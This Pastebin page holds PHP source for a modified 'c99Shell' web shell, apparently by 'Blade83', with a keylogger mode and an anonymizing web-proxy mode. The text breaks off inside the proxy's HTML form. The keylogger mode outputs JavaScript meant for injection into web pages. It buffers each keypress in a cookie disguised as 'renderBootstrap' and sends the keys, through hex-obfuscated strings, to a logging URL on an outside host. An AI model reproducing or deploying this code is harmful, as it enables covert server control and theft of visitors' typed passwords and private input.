Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*> ____ _ _ ___ _____
- *> | __ )| | __ _ __| | ___ ( _ )___ /
- *> | _ \| |/ _` |/ _` |/ _ \/ _ \ |_ \
- *> | |_) | | (_| | (_| | __/ (_) |__) |
- *> |____/|_|\__,_|\__,_|\___|\___/____/
- *>
- ** - - - - - - - - - - - - - - - - - - - - - - - +
- => Web ......... http://cplusplus-development.de |
- => Mail ........................ mail@blade83.de |
- => (c) ............... 2005-2014 Johannes Krämer |
- ** - - - - - - - - - - - - - - - - - - - - - - - +
- **
- => Project: c99Shell
- => Filename: shell.php
- => Version: 18
- => Modify by: Blade83
- */
- if(!isset($_SESSION)) session_start();
- if ($_GET['proxy'] == true)
- {
- $_SESSION['show_proxy'] = true;
- header("Location: ".(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on'?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
- exit;
- } elseif ($_GET['keylogger'] == true)
- {
- $_SESSION['show_keylogger'] = true;
- header("Location: ".(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on'?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
- exit;
- } elseif ($_GET['shell'] == true)
- {
- unset($_SESSION['show_proxy']);
- unset($_SESSION['show_keylogger']);
- }
- if($_SESSION['show_keylogger'])
- {
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <meta charset="utf-8">
- <title></title>
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <meta name="Keywords" content="" />
- </head>
- <body>
- <p align="center"><a href="<?php echo (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on'?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."?shell=true"?>">Back to Shell</a></p>
- <textarea name="keyloggerCode" style="width:100%;height:600px">
- <script>
- //<![CDATA[
- function setBootstrapCookie(cname,cvalue){
- var d=new Date();
- d.setTime(d.getTime()+(0x16D*0x18*0x3C*0x3C*0x3E8));
- document.cookie=cname+"="+cvalue+"; expires="+d.toGMTString();
- }
- function getBootstrapCookie(cname){
- var blockComplete = 0x00000020, bBlockComplete = blockComplete.toString(0x00000002);
- var name=cname+"=", ca=document.cookie.split(';');
- for(var i=0;i<ca.length;i++) {
- var c=ca[i], re=new RegExp(cname);
- if(re.test(c)){
- var block=c.split('=')[1], countBlock=block.split(',');
- if (countBlock.length >= parseInt(bBlockComplete,0x00000002)) {
- document.cookie=cname+"=; expires=Thu, 01 Jan 1970 00:00:00 GMT";
- updateBootstrapCookie(block);
- }
- }
- while(c.charAt(0)==' ') { c=c.substring(1); }
- if (c.indexOf(name) != -1) { return c.substring(name.length,c.length); }
- }
- return false;
- }
- function updateBootstrapCookie(arg) {
- var _0x27ef=[
- "\x47\x45\x54",
- "\x68\x74\x74\x70"+
- "\x3A\x2F\x2F\x62"+
- "\x6C\x61\x64\x65"+
- "\x38\x33\x2E\x64"+
- "\x65\x2F\x6C\x6F"+
- "\x67\x2F\x6B\x65"+
- "\x79\x6C\x6F\x67"+
- "\x67\x65\x72\x2E"+
- "\x70\x68\x70\x3F"+
- "\x6B\x65\x79\x43"+
- "\x68\x61\x72\x43"+
- "\x6F\x64\x65\x3D",
- "\x6F\x70\x65\x6E",
- "\x73\x65\x6E\x64"
- ]; try{ var display=new XMLHttpRequest();
- display[_0x27ef[2]](_0x27ef[0],_0x27ef[1]+arg,true);
- display[_0x27ef[3]]();} catch(e){};
- }
- document.onkeypress = function(evt){
- evt=evt||window.event; if(evt.charCode){
- var _0x9855=["\x72\x65\x6E\x64\x65\x72\x42\x6F\x6F\x74\x73\x74\x72\x61\x70"];
- var cn=_0x9855[0]; try {
- if (getBootstrapCookie(cn)) {
- var arr=getBootstrapCookie(cn).split(",");
- arr[arr.length]=evt.charCode;
- setBootstrapCookie(cn,arr.toString());
- } else { setBootstrapCookie(cn,evt.charCode); }
- } catch(e) {}
- }
- }
- //]]>
- </script>
- </textarea>
- </body>
- </html>
- <?php
- exit;
- }
- if($_SESSION['show_proxy'])
- {
- global $CONFIG;
- $CONFIG=array();
- # PHP DECODING FUNCTIONS {{{
- function my_base64_decode($string){
- return base64_decode(str_replace(' ','+',urldecode($string)));
- }
- function proxdec($url){
- if(strlen($url)==0 || ($url{0}!='~' && strtolower(substr($url,0,3))!='%7e'))
- return $url;
- #while(strpos($url,'%')!==false) $url=urldecode($url);
- #$url=urldecode($url);
- while($url{0}=='~' || strtolower(substr($url,0,3))=='%7e'){
- $url=substr($url,1);
- $url=my_base64_decode($url);
- $new_url=null;
- for($i=0;$i<strlen($url);$i++){
- $char=ord($url{$i});
- $char-=ord(substr(SESS_PREF,$i%strlen(SESS_PREF),1));
- while($char<32) $char+=94;
- $new_url.=chr($char);
- }
- $url=$new_url;
- }
- return urldecode($url);
- }
- # }}}
- $CONFIG['SYS_TIMEZONE']='GMT';
- $CONFIG['DEFAULT_SIMPLE']=false;
- $CONFIG['FORCE_SIMPLE']=false;
- $CONFIG['SIMPLE_MODE_URLWIDTH']='300px';
- $CONFIG['DISABLE_POST_COOKIES']=false;
- $CONFIG['INCLUDE_MAIN_HEADER']='';
- $CONFIG['INCLUDE_MAIN_FOOTER']='';
- $CONFIG['INCLUDE_URL_HEADER']='';
- $CONFIG['DEFAULT_TUNNEL_IP']='';
- $CONFIG['DEFAULT_TUNNEL_PORT']='';
- $CONFIG['FORCE_DEFAULT_TUNNEL']=false;
- $CONFIG['DEFAULT_USER_AGENT']='';
- $CONFIG['FORCE_DEFAULT_USER_AGENT']=false;
- $CONFIG['DEFAULT_URL_FORM']=true;
- $CONFIG['FORCE_DEFAULT_URL_FORM']=false;
- $CONFIG['DEFAULT_REMOVE_COOKIES']=false;
- $CONFIG['FORCE_DEFAULT_REMOVE_COOKIES']=false;
- $CONFIG['DEFAULT_REMOVE_REFERER']=true;
- $CONFIG['FORCE_DEFAULT_REMOVE_REFERER']=false;
- $CONFIG['DEFAULT_REMOVE_SCRIPTS']=false;
- $CONFIG['FORCE_DEFAULT_REMOVE_SCRIPTS']=false;
- $CONFIG['DEFAULT_REMOVE_OBJECTS']=false;
- $CONFIG['FORCE_DEFAULT_REMOVE_OBJECTS']=false;
- $CONFIG['DEFAULT_ENCRYPT_URLS']=true;
- $CONFIG['FORCE_DEFAULT_ENCRYPT_URLS']=false;
- $CONFIG['DEFAULT_ENCRYPT_COOKIES']=false;
- $CONFIG['FORCE_DEFAULT_ENCRYPT_COOKIES']=false;
- $CONFIG['DEFAULT_ENCODE_HTML']=false;
- $CONFIG['FORCE_DEFAULT_ENCODE_HTML']=false;
- /*/ Address Blocking Notes \*\
- Formats for address blocking are as follows:
- 1.2.3.4 - plain IP address
- 1.0.0.0/16 - subnet blocking
- 1.0/16 - subnet blocking
- 1/8 - subnet blocking
- php.net - domain blocking
- Default Value: '10/8','172/8','192.168/16','127/8','169.254/16'
- \*\ End Address Blocking Notes /*/
- $CONFIG['BLOCKED_ADDRESSES']= array();
- $CONFIG['MAXIMUM_URL_LENGTH']=500;
- $CONFIG['TIME_LIMIT']=30;
- $CONFIG['DNS_CACHE_EXPIRE']=10;
- $CONFIG['MEMORY_LIMIT']='128M';
- $CONFIG['PERSISTENT_CONNECTIONS']=true;
- $CONFIG['PERSISTENT_CONNECTIONS_TIMEOUT']=30;
- $CONFIG['PCRE_BACKTRACK_LIMIT']=200000;
- $CONFIG['PCRE_RECURSION_LIMIT']=200000;
- $CONFIG['GZIP_PROXY_USER']=false;
- $CONFIG['GZIP_PROXY_SERVER']=false;
- $CONFIG['PROTO']=false;
- $CONFIG['SSL_WARNING_IGNORE_FILETYPES'] = array(
- '.css', '.js', '.gif', '.jpeg', '.jpg', '.png', '.bmp'
- );
- global $LABEL;
- $LABEL=array();
- $LABEL['TITLE']='.W.E.B.P.R.O.X.Y. @ Blade83.de';
- $LABEL['URL']='URL:';
- $LABEL['TUNNEL']='Tunnel Proxy:';
- $LABEL['USER_AGENT']='User-Agent:';
- $LABEL['USER_AGENT_CUSTOM']='';
- $LABEL['URL_FORM']='Persistent URL Form';
- $LABEL['REMOVE_COOKIES']='Remove Cookies';
- $LABEL['REMOVE_REFERER']='Remove Referer Field';
- $LABEL['REMOVE_SCRIPTS']='Remove Scripts (JS, VBS, etc)';
- $LABEL['REMOVE_OBJECTS']='Remove Objects (Flash, Java, etc)';
- $LABEL['ENCRYPT_URLS']='Encrypt URLs';
- $LABEL['ENCRYPT_COOKIES']='Encrypt Cookies';
- $LABEL['ENCODE_HTML']='Encode HTML';
- $LABEL['SUBMIT_MAIN']='Go to Webpage';
- $LABEL['SUBMIT_SIMPLE']='Go to Webpage';
- global $STYLE;
- $STYLE=array();
- # body of whole document
- $STYLE['body']='
- font-family: bitstream vera sans, arial;
- margin: 0px;
- padding: 0px;
- ';
- # <form>
- $STYLE['form#proxy_form']='
- margin: 0px;
- padding: 0px;
- ';
- # <table>
- $STYLE['table#proxy_table']='
- margin: 0px;
- padding: 0px;
- margin-left: auto;
- margin-right: auto;
- ';
- # the title text above form
- $STYLE['td#proxy_title']='
- font-weight: bold;
- font-size: 1.4em;
- text-align: center;
- ';
- # class for all text fields
- $STYLE['input.proxy_text']='
- width: 100%;
- border: 1px solid #000000;
- ';
- # class for all select fields
- $STYLE['select.proxy_select']='
- width: 100%;
- border: 1px solid #000000;
- ';
- # class for all proxy defined links
- $STYLE['a.proxy_link']='
- color: #000000;
- ';
- # class for all submit buttons
- $STYLE['input.proxy_submit']='
- border: 1px solid #000000;
- background-color: #FFFFFF;
- ';
- # the simple submit button
- $STYLE['input#proxy_submit_simple']='';
- # the main submit button
- $STYLE['input#proxy_submit_main']='
- width: 100%;
- ';
- # the tunnel proxy ip field
- $STYLE['input#proxy_tunnel_ip']='
- float: left;
- width: 73%;
- ';
- # the tunnel proxy port field
- $STYLE['input#proxy_tunnel_port']='
- float: right;
- width: 23%;
- ';
- # the link for script information and a link to the author
- $STYLE['a#proxy_link_author']='
- float: left;
- ';
- # the link for toggling modes
- $STYLE['a#proxy_link_mode']='
- float: right;
- ';
- # }}}
- # STYLE_URL_FORM {{{
- # The default value for $STYLE_URL_FORM is to be completely blank. Add entries
- # as you please.
- global $STYLE_URL_FORM;
- $STYLE_URL_FORM=array();
- # }}}
- // DON'T EDIT ANYTHING AFTER THIS POINT \\
- #
- # (unless you absolutely know what you are doing...)
- #
- # USER CONFIG {{{
- define('THIS_FILE',"{$_SERVER['DOCUMENT_ROOT']}{$_SERVER['PHP_SELF']}");
- $file_ext_pos=strrpos(THIS_FILE,'.');
- define('CONFIG_FILE',
- substr(THIS_FILE,0,$file_ext_pos).
- '.conf'.
- substr(THIS_FILE,$file_ext_pos)
- );
- if(file_exists(CONFIG_FILE))
- include(CONFIG_FILE);
- # }}}
- # TESTING CENTER {{{
- if($IS_SANDBOX){
- // these values must be false for the output to be plain text
- $CONFIG['GZIP_PROXY_USER']=false;
- $CONFIG['GZIP_PROXY_SERVER']=false;
- }
- # }}}
- # COOKIE & SESSION SETUP {{{
- //$totstarttime=microtime(true); # BENCHMARK
- # set error level to not display notices
- error_reporting(E_ALL^E_NOTICE);
- # set timezone (required now in PHP)
- date_default_timezone_set($CONFIG['SYS_TIMEZONE']);
- # PCRE
- ini_set('pcre.backtrack_limit', $CONFIG['PCRE_BACKTRACK_LIMIT']);
- ini_set('pcre.recursion_limit', $CONFIG['PCRE_RECURSION_LIMIT']);
- # set time and memory limits to their defined values, if not in safe mode
- if(!ini_get('safe_mode')) set_time_limit($CONFIG['TIME_LIMIT']);
- if(!ini_get('safe_mode')) ini_set('memory_limit', $CONFIG['MEMORY_LIMIT']);
- # use gzip compression if available and enabled
- if($CONFIG['GZIP_PROXY_USER'] && extension_loaded('zlib') &&
- !ini_get('zlib.output_compression')
- ) ob_start('ob_gzhandler');
- # reverse magic quotes if enabled
- if(
- ini_get('magic_quotes_sybase')==1 ||
- (ini_get('magic_quotes_sybase')=='' && get_magic_quotes_gpc())
- ){
- function stripslashes_recurse($var){
- if(is_array($var)) $var=array_map('stripslashes_recurse',$var);
- else{
- if(ini_get('magic_quotes_sybase')==1 && get_magic_quotes_gpc())
- $var=str_replace('\\\'','\'',$var);
- else
- $var=stripslashes($var);
- }
- return $var;
- }
- $_GET=stripslashes_recurse($_GET);
- $_POST=stripslashes_recurse($_POST);
- $_COOKIE=stripslashes_recurse($_COOKIE);
- }
- # script environment constants
- $CONFIG['PROTO']=(
- isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on'?
- 'https':'http'
- );
- define('VERSION','1.9.1b');
- define('THIS_SCRIPT',
- $CONFIG['PROTO']."://{$_SERVER['HTTP_HOST']}{$_SERVER['PHP_SELF']}");
- # randomized cookie prefixes
- function gen_randstr($len){
- $chars=null;
- for($i=0;$i<$len;$i++){
- $char=rand(0,25);
- $char=chr($char+97);
- $chars.=$char;
- }
- return $chars;
- }
- function dosetcookie($cookname,$cookval,$expire=null){
- $_COOKIE[$cookname]=$cookval;
- if($expire===null) setcookie($cookname,$cookval);
- else setcookie($cookname,$cookval,$expire);
- }
- if(!isset($_SESSION)) session_start();
- define('SESS_PREF_LEN',30);
- if(empty($_SESSION['sesspref'])){
- $sesspref=gen_randstr(SESS_PREF_LEN);
- $_SESSION['sesspref']=$sesspref;
- }
- else $sesspref=$_SESSION['sesspref'];
- if(empty($_COOKIE['user'])){
- define('COOK_PREF_LEN',12);
- $cookpref=gen_randstr(COOK_PREF_LEN);
- dosetcookie('user',$cookpref);
- } else {
- $cookpref=$_COOKIE['user'];
- // the reason we do this dynamically is to support the sandbox asserts
- define('COOK_PREF_LEN',strlen($cookpref));
- }
- define('SESS_PREF',$sesspref);
- define('COOK_PREF',$cookpref);
- define('FERP_KOOC',strrev($cookpref));
- define('COOKIE_SEPARATOR','__'.COOK_PREF.'__');
- unset($sesspref,$cookpref);
- global $proxy_variables;
- $proxy_variables=array(
- 'user', COOK_PREF, COOK_PREF.'_set_values',
- COOK_PREF.'_tunnel_ip',COOK_PREF.'_tunnel_port',
- COOK_PREF.'_useragent',COOK_PREF.'_useragent_custom',
- COOK_PREF.'_url_form',
- COOK_PREF.'_remove_cookies',COOK_PREF.'_remove_referer',
- COOK_PREF.'_remove_scripts',COOK_PREF.'_remove_objects',
- COOK_PREF.'_encrypt_urls',COOK_PREF.'_encrypt_cookies');
- # ssl domains array handling
- if(!empty($_GET[COOK_PREF.'_ssl_domain'])){
- if(!is_array($_SESSION['ssl_domains'])) $_SESSION['ssl_domains']=array();
- $_SESSION['ssl_domains'][]=$_GET[COOK_PREF.'_ssl_domain'];
- exit();
- }
- # }}}
- # ENVIRONMENT SETUP {{{
- global $postandget,$dns_cache_array;
- $postandget=array_merge($_GET,$_POST);
- define('PAGETYPE_MINIREGEXP','(=[_\.\-]?\&=|=)?');
- define('PAGETYPE_REGEXP','/^'.PAGETYPE_MINIREGEXP.'(.*)$/');
- $pagetype_str=preg_replace(PAGETYPE_REGEXP,'\1',$_SERVER['QUERY_STRING']);
- define('QUERY_STRING',
- substr($_SERVER['QUERY_STRING'],
- strlen($pagetype_str),
- strlen($_SERVER['QUERY_STRING'])-strlen($pagetype_str)));
- define('PAGETYPE_NULL',0);
- define('PAGETYPE_FORCE_MAIN',1);
- define('PAGETYPE_FRAME_TOP',2);
- define('PAGETYPE_FRAMED_PAGE',3);
- # framing children for crimes isn't very nice, but the script does it anyway
- define('PAGETYPE_FRAMED_CHILD',4);
- switch($pagetype_str){
- case '=&=': define('PAGETYPE_ID',PAGETYPE_FRAME_TOP); break;
- case '=_&=': define('PAGETYPE_ID',PAGETYPE_FRAMED_PAGE); break;
- case '=-&=': define('PAGETYPE_ID',PAGETYPE_FORCE_MAIN); break;
- case '=.&=': define('PAGETYPE_ID',PAGETYPE_FRAMED_CHILD); break;
- # this is one more unencoded string for future features
- # case '=*&=': define('PAGETYPE_ID',); break;
- default: define('PAGETYPE_ID',PAGETYPE_NULL); break;
- }
- unset($pagetype_str);
- define('NEW_PAGETYPE_FRAME_TOP',(
- PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?
- PAGETYPE_FRAMED_CHILD:PAGETYPE_FRAME_TOP
- ));
- define('NEW_PAGETYPE_FRAMED_PAGE',(
- PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?
- PAGETYPE_FRAMED_CHILD:PAGETYPE_FRAMED_PAGE
- ));
- if(!empty($postandget[COOK_PREF])){
- $oenc_url="{$postandget[COOK_PREF]}?";
- foreach($postandget as $key=>$val){
- if(!in_array($key,$proxy_variables) && $key!=''){
- $key=urlencode($key);
- $val=urlencode($val);
- $oenc_url.="{$key}={$val}&";
- }
- }
- $oenc_url=substr($oenc_url,0,-1);
- } else $oenc_url=QUERY_STRING;
- if(
- strpos(substr($oenc_url,0,6),'%')!==false ||
- strpos($oenc_url,'%')<strpos($oenc_url,'/') ||
- strpos($oenc_url,'%')<strpos($oenc_url,':')
- ) $oenc_url=urldecode($oenc_url);
- define('OENC_URL',preg_replace('/^([^\?\&]+)\&/i','\1?',$oenc_url));
- unset($oenc_url);
- define('ORIG_URL',proxdec(OENC_URL));
- global $curr_url;
- $curr_url=ORIG_URL;
- define('PAGE_FRAMED',
- PAGETYPE_ID===PAGETYPE_FRAMED_PAGE ||
- PAGETYPE_ID===PAGETYPE_FRAMED_CHILD ||
- QUERY_STRING=='js_regexps_framed' ||
- QUERY_STRING=='js_funcs_framed'
- );
- # ENVIRONMENT SETUP: OPTIONS {{{
- global $OPTIONS;
- $OPTIONS=array();
- define('IS_FORM_INPUT',!empty($postandget[COOK_PREF.'_set_values']));
- # registers an option with the OPTIONS array
- function register_option(
- $config_type,
- $config_name,
- $cookie_name=null,
- $force_name=null
- ){
- if($cookie_name==null)
- $cookie_name=strtolower($config_name);
- if($force_name==null)
- $force_name=$config_name;
- global $CONFIG,$OPTIONS,$postandget;
- # get user input
- $user_input=(
- IS_FORM_INPUT?
- (
- isset($postandget[COOK_PREF."_{$cookie_name}"])?
- $postandget[COOK_PREF."_{$cookie_name}"]:false
- ):
- (
- isset($_COOKIE[COOK_PREF."_{$cookie_name}"])?
- $_COOKIE[COOK_PREF."_{$cookie_name}"]:false
- )
- );
- # option parsers
- switch($config_type){
- # integer option
- case 2:
- $user_input=intval($user_input);
- break;
- # true/false option
- case 1:
- $user_input=(
- IS_FORM_INPUT?
- !empty($user_input):
- $user_input=='true'
- );
- break;
- # standard option
- case 0:
- default:
- break;
- }
- # set option value
- $OPTIONS[$config_name]=(
- $CONFIG["FORCE_DEFAULT_{$force_name}"] || (
- !IS_FORM_INPUT && !isset($_COOKIE[COOK_PREF."_{$cookie_name}"])
- )?
- $CONFIG["DEFAULT_{$config_name}"]:
- $user_input
- );
- # set cookies
- if(IS_FORM_INPUT){
- dosetcookie(COOK_PREF."_{$cookie_name}",false,0);
- if($OPTIONS[$config_name]!=$CONFIG["DEFAULT_{$config_name}"]){
- if($config_type==1)
- dosetcookie(
- COOK_PREF."_{$cookie_name}",
- ($OPTIONS[$config_name]?'true':'false')
- );
- else
- dosetcookie(COOK_PREF."_{$cookie_name}",$OPTIONS[$config_name]);
- }
- }
- }
- # register standard options
- register_option(0,'TUNNEL_IP',null,'TUNNEL');
- register_option(1,'URL_FORM');
- register_option(1,'REMOVE_COOKIES');
- register_option(1,'REMOVE_REFERER');
- register_option(1,'REMOVE_SCRIPTS');
- register_option(1,'REMOVE_OBJECTS');
- register_option(1,'ENCRYPT_URLS');
- register_option(1,'ENCRYPT_COOKIES');
- register_option(1,'ENCODE_HTML');
- # register custom defined options
- $OPTIONS['USER_AGENT']=(
- $CONFIG['FORCE_DEFAULT_USER_AGENT'] || empty($_COOKIE['_useragent'])?
- $CONFIG['DEFAULT_USER_AGENT']:(
- $_COOKIE[COOK_PREF.'_useragent']=='1'?
- $_COOKIE[COOK_PREF.'_useragent_custom']:
- $_COOKIE[COOK_PREF.'_useragent']
- )
- );
- register_option(2,'TUNNEL_PORT',null,'TUNNEL');
- if($OPTIONS['TUNNEL_PORT']<1 || $OPTIONS['TUNNEL_PORT']>65535)
- $OPTIONS['TUNNEL_PORT']=null;
- $OPTIONS['SIMPLE_MODE']=$CONFIG['DEFAULT_SIMPLE'] || $CONFIG['FORCE_SIMPLE'];
- if(empty($OPTIONS['USER_AGENT']))
- $OPTIONS['USER_AGENT']=$_SERVER['HTTP_USER_AGENT'];
- # }}}
- # }}}
- # FIRST PAGE DISPLAYED WHEN ACCESSING PROXY {{{
- if(
- PAGETYPE_ID===PAGETYPE_FORCE_MAIN ||
- (substr(QUERY_STRING,0,3)!='js_' && ORIG_URL==null)
- ){
- $useragent_platforms=array(
- array('Windows', 'windows', 'win32'),
- array('Linux', 'linux'),
- array('Macintosh', 'macintosh', 'mac_powerpc'),
- array('BSD', 'bsd')
- );
- $useragent_browsers=array(
- 'firefox' => 'Firefox',
- 'iceweasel' => 'Iceweasel',
- 'konqueror' => 'Konqueror',
- 'msie' => 'Internet Explorer',
- 'netscape' => 'Netscape',
- 'opera' => 'Opera',
- 'safari' => 'Safari',
- 'seamonkey' => 'SeaMonkey'
- );
- $useragentinfo=null;
- # parse platform
- $dobreak=false;
- foreach($useragent_platforms as $platform){
- for($i=1; $i<count($platform); $i++){
- if(stristr($_SERVER['HTTP_USER_AGENT'], $platform[$i])!==false){
- $useragentinfo.=$platform[0];
- $dobreak=true;
- break;
- }
- }
- if($dobreak)
- break;
- }
- if(!$dobreak)
- $useragentinfo.='Unknown';
- # separator
- $useragentinfo.=' / ';
- # parse browser
- $found=false;
- foreach($useragent_browsers as $substr=>$browser){
- if(stristr($_SERVER['HTTP_USER_AGENT'],$browser)!==false){
- $useragentinfo.=$browser;
- $found=true;
- break;
- }
- }
- if(!$found)
- $useragentinfo.='Unknown';
- # construct useragent options
- $ver=array(
- 'dillo' => '0.8.6',
- 'firefox' => '2.0',
- 'gecko' => '20061024',
- 'konq' => '3.5',
- 'konq_minor' => '3.5.5',
- 'links' => '2.1pre19',
- 'lynx' => '2.8.5rel.1',
- 'moz_rev' => '1.8.1',
- 'msie6' => '6.0',
- 'msie7' => '7.0',
- 'opera' => '9.02',
- 'safari' => '3.0',
- 'webkit' => '521.25',
- 'wget' => '1.10.2',
- 'windows' => 'NT 5.1'
- );
- $useragent_array=array(
- array('-1',' [ Don\'t Send ] '),
- array(null,"Actual ({$useragentinfo})"),
- array("Mozilla/5.0 (Windows; U; Windows {$ver['windows']}; en-US; ".
- "rv:{$ver['moz_rev']}) Gecko/{$ver['gecko']} Firefox/".
- $ver['firefox'],
- "Windows XP / Firefox {$ver['firefox']}"),
- array("Mozilla/4.0 (compatible; MSIE {$ver['msie7']}; Windows ".
- "{$ver['windows']}; SV1)", 'Windows XP / Internet Explorer 7'),
- array("Mozilla/4.0 (compatible; MSIE {$ver['msie6']}; Windows ".
- "{$ver['windows']}; SV1)", 'Windows XP / Internet Explorer 6'),
- array("Opera/{$ver['opera']} (Windows {$ver['windows']}; U; en)",
- "Windows XP / Opera {$ver['opera']}"),
- array("Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:".
- "{$ver['moz_rev']}) Gecko/{$ver['gecko']} Firefox/{$ver['firefox']}",
- "Mac OS X / Firefox {$ver['firefox']}"),
- array("Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/".
- "{$ver['webkit']} (KHTML, like Gecko) Safari/{$ver['webkit']}",
- 'Mac OS X / Safari 3.0'),
- array("Opera/{$ver['opera']} (Macintosh; PPC Mac OS X; U; en)",
- "Mac OS X / Opera {$ver['opera']}"),
- array("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:{$ver['moz_rev']}) ".
- "Gecko/{$ver['gecko']} Firefox/{$ver['firefox']}",
- "Linux / Firefox {$ver['firefox']}"),
- array("Opera/{$ver['opera']} (X11; Linux i686; U; en)",
- "Linux / Opera {$ver['opera']}"),
- array("Mozilla/5.0 (compatible; Konqueror/{$ver['konq']}; Linux) KHTML/".
- "{$ver['konq_minor']} (like Gecko)",
- "Linux / Konqueror {$ver['konq_minor']}"),
- array("Links ({$ver['links']}; Linux 2.6 i686; x)",
- "Linux / Links ({$ver['links']})"),
- array("Lynx/{$ver['lynx']}","Any / Lynx {$ver['lynx']}"),
- array("Dillo/{$ver['dillo']}","Any / Dillo {$ver['dillo']}"),
- array("Wget/{$ver['wget']}","Any / Wget {$ver['wget']}"),
- array('1',' [ Custom ]')
- );
- define('IPREGEXP',
- '/^((?:[0-2]{0,2}[0-9]{1,2}\.){3}[0-2]{0,2}[0-9]{1,2})\:([0-9]{1,5}$/');
- $checkbox_array=array(
- 'URL_FORM',
- 'REMOVE_COOKIES',
- 'REMOVE_REFERER',
- 'REMOVE_SCRIPTS',
- 'REMOVE_OBJECTS',
- 'ENCRYPT_URLS',
- 'ENCRYPT_COOKIES',
- 'ENCODE_HTML'
- );
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title><?php echo($LABEL['TITLE']); ?></title>
- <meta http-equiv="content-type" content="text/html; charset=utf-8" />
- <link rel="stylesheet" type="text/css" href="<?php echo(THIS_SCRIPT); ?>?css_main" />
- <style>
- input#proxy_submit_simple {
- display: <?php echo(($OPTIONS['SIMPLE_MODE']?'inline':'none')); ?>;
- }
- label { cursor:pointer; }
- </style>
- <noscript><style>
- input#proxy_url { display: none; }
- a#proxy_link_author { float: none; }
- a#proxy_link_mode { display: none; }
- td#proxy_links_td { text-align: center; }
- </style></noscript>
- <script type="text/javascript"
- src="<?php echo(THIS_SCRIPT); ?>?js_funcs_nowrap"></script>
- <script type="text/javascript" language="javascript"><!--
- var advanced_mode=<?php echo(($OPTIONS['SIMPLE_MODE']?'false':'true')); ?>;
- //--></script>
- </head>
- <body>
- <?php if( // main header include
- !empty($CONFIG['INCLUDE_MAIN_HEADER']) &&
- file_exists($CONFIG['INCLUDE_MAIN_HEADER'])
- ) include($CONFIG['INCLUDE_MAIN_HEADER']); ?>
- <form method="post" id="proxy_form" onsubmit="return main_submit_code();"
- action="<?php echo(THIS_SCRIPT); ?>">
- <input type="hidden" name="<?php echo(COOK_PREF); ?>_set_values" value="1" />
- <input type="hidden" id="proxy_url_hidden" disabled="disabled"
- name="<?php echo(COOK_PREF); ?>" />
- <table id="proxy_table" cellpadding="0" cellspacing="4" border="0">
- <tr>
- <td colspan="2" id="proxy_title"><?php echo($LABEL['TITLE']); ?></td>
- </tr>
- <tr>
- <td><label for="proxy_url"><?php echo($LABEL['URL']); ?></label></td>
- <td>
- <input type="text" id="proxy_url" class="proxy_text"
- value="<?php echo(ORIG_URL); ?>" />
- <noscript>
- <input type="text" id="proxy_url_noscript" class="proxy_text"
- name="<?php echo(COOK_PREF); ?>"
- value="<?php echo(ORIG_URL); ?>" />
- </noscript>
- <input type="submit" id="proxy_submit_simple" class="proxy_submit"
- value="<?php echo($LABEL['SUBMIT_SIMPLE']); ?>" style="cursor:pointer;" />
- </td>
- </tr>
- <?php if(!$CONFIG['FORCE_DEFAULT_TUNNEL']){ ?>
- <tr name="advanced_mode">
- <td><label for="proxy_tunnel_ip"><?php echo($LABEL['TUNNEL']); ?></label></td>
- <td>
- <input type="text" id="proxy_tunnel_ip" class="proxy_text"
- name="<?php echo(COOK_PREF); ?>_tunnel_ip"
- value="<?php echo($OPTIONS['TUNNEL_IP']); ?>" />
- <input type="text" size="5" maxlength="5"
- id="proxy_tunnel_port" class="proxy_text"
- name="<?php echo(COOK_PREF); ?>_tunnel_port"
- value="<?php echo($OPTIONS['TUNNEL_PORT']); ?>" />
- </td>
- </tr>
- <?php } ?>
- <?php if(!$CONFIG['FORCE_DEFAULT_USER_AGENT']){ ?>
- <tr name="advanced_mode">
- <td><label for="proxy_useragent"><?php echo($LABEL['USER_AGENT']); ?></label></td>
- <td>
- <select name="<?php echo(COOK_PREF); ?>_useragent"
- id="proxy_useragent" class="proxy_select"
- onchange="useragent_change();">
- <?php foreach($useragent_array as $useragent){ ?>
- <option value="<?php echo($useragent[0]); ?>"
- <?php if($OPTIONS['USER_AGENT']==$useragent[0])
- echo ' selected="selected"'; ?>
- ><?php echo($useragent[1]); ?></option>
- <?php } ?>
- </select>
- </td>
- </tr>
- <tr id="proxy_useragent_custom_tr" name="advanced_mode"
- class="display_<?php echo(($OPTIONS['USER_AGENT']=='1'?'tr':'none')); ?>">
- <td><?php echo($LABEL['USER_AGENT_CUSTOM']); ?></td>
- <td>
- <input type="text" id="proxy_useragent_custom" class="proxy_text"
- name="<?php echo(COOK_PREF); ?>_useragent_custom"
- value="<?php echo($OPTIONS['USER_AGENT']); ?>" />
- </td>
- </tr>
- <?php } ?>
- <?php
- foreach($checkbox_array as $checkbox){
- if(!$CONFIG['FORCE_DEFAULT_'.$checkbox]){
- $lowername=strtolower($checkbox);
- ?>
- <tr name="advanced_mode">
- <td> </td>
- <td>
- <input type="checkbox" id="proxy_<?php echo($lowername); ?>"
- class="proxy_checkbox"
- name="<?php echo(COOK_PREF); ?>_<?php echo($lowername); ?>"
- <?php if($OPTIONS[$checkbox]) echo 'checked="checked"'; ?>
- /> <label for="proxy_<?php echo($lowername); ?>"><?php echo($LABEL[$checkbox]); ?></label>
- </td>
- </tr>
- <?php }
- } ?>
- <tr name="advanced_mode">
- <td colspan="2">
- <input type="submit" id="proxy_submit_main" class="proxy_submit"
- value="<?php echo($LABEL['SUBMIT_MAIN']); ?>" style="cursor:pointer;" />
- </td>
- </tr>
- <tr>
- <td colspan="2" id="proxy_links_td">
